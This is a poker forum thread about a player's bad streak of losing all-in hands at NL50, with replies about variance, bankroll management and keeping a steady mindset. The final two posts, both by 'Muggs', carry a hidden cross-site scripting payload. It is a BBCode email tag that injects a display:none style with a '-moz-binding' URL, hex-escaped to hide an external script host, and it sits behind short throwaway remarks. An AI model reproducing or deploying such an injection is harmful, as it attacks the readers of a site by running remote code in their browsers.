BAD STREAK please help

• shloogy
      shloogy
      Bronze
      HI guys
      i have had a terrible day yesterday lost 15 times in a row starting with the best hands pushing all in pre flop ending losing to underdogs - AA to small pockets, AK to AQ etc.

am checking my hh on poker tracker and cant believe this .

playing SSS on NL50 (10$ buy in)

lost 160$ and very disappointed and sad, now i have 500$ on my account.

thanks in advance
  • 10 replies
    • tehChipDonk
      tehChipDonk
      Bronze
      take a break and let your mental alertness reset then............... YEAH, back to the grind.....
    • TribunCaesar
      TribunCaesar
      Bronze
      Such swings can happen to all of us. Just take your time, calm down and go back to the tables.

Best regards,
      TribunCaesar
    • lilprincess
      lilprincess
      Bronze
      I lost 1K at NL50 in a week, what you need to do is not let it affect your game, continue to play aggressively, don't put yourself in tough spots, and move down a limit if necessary.

and quit SSS, play deep 6 on FTP :P :P :P :P
    • hunt32
      hunt32
      Bronze
      The exact same thing here.

Only I'm down 25 buy ins or 250$ and i don't have 500$ more on my account but 200-250$, I've moved down limit at least to make up my confidence and bankroll a bit, so far up 10 BI in 1000 hands...

gl
    • aciddrop
      aciddrop
      Bronze
      Yeah, this is normal, but of course, you will never enjoy that it happens.

Just as an example of skewed results, at the moment I have played 3012 hands of SH at Titan. In those hands I have had AA 21 times. So far, it hasn't lost for me.

Now that's good. AA is the best hand, it should win. But 100% of the time?

It means that sooner or later, and probably very sooner, I am going to have my bullets cracked. Will that be by a better hand? Not possible. Not preflop, anyway. But it is going to happen, and when it does, it will quite likely be against some fool who plays 58os and hits a river straight. (This happened the other day on Pacific. Next hand against same guy, I got AKs and got all in preflop, he showed AA, and I didn't get lucky). And it will be for a big pot. And I will curse. And then I will continue to play the same way, because it is winning play.

Because you have been playing correctly, you have the bankroll to sustain this kind of result. If it continues like this, move down a level, and keep playing correctly. Enjoy playing poker. Even when you get this kind of result, because this won't be the only time it happens to you.
    • chenny8888
      chenny8888
      Silver
      Originally posted by aciddrop
      Yeah, this is normal, but of course, you will never enjoy that it happens.

Just as an example of skewed results, at the moment I have played 3012 hands of SH at Titan. In those hands I have had AA 21 times. So far, it hasn't lost for me.

Now that's good. AA is the best hand, it should win. But 100% of the time?

It means that sooner or later, and probably very sooner, I am going to have my bullets cracked. Will that be by a better hand? Not possible. Not preflop, anyway. But it is going to happen, and when it does, it will quite likely be against some fool who plays 58os and hits a river straight. (This happened the other day on Pacific. Next hand against same guy, I got AKs and got all in preflop, he showed AA, and I didn't get lucky). And it will be for a big pot. And I will curse. And then I will continue to play the same way, because it is winning play.

Because you have been playing correctly, you have the bankroll to sustain this kind of result. If it continues like this, move down a level, and keep playing correctly. Enjoy playing poker. Even when you get this kind of result, because this won't be the only time it happens to you.
      <3 your writing.
    • aciddrop
      aciddrop
      Bronze
      Originally posted by chenny8888
      <3 your writing.
      you shit on my writing?
    • RMB
      RMB
      Bronze
      Originally posted by aciddrop
      Originally posted by chenny8888
      <3 your writing.
      you shit on my writing?
      LOL
    • Muggs
      Muggs
      Bronze
      Don't dive up!
      http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]
    • Muggs
      Muggs
      Bronze
      What are you laughing at?http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]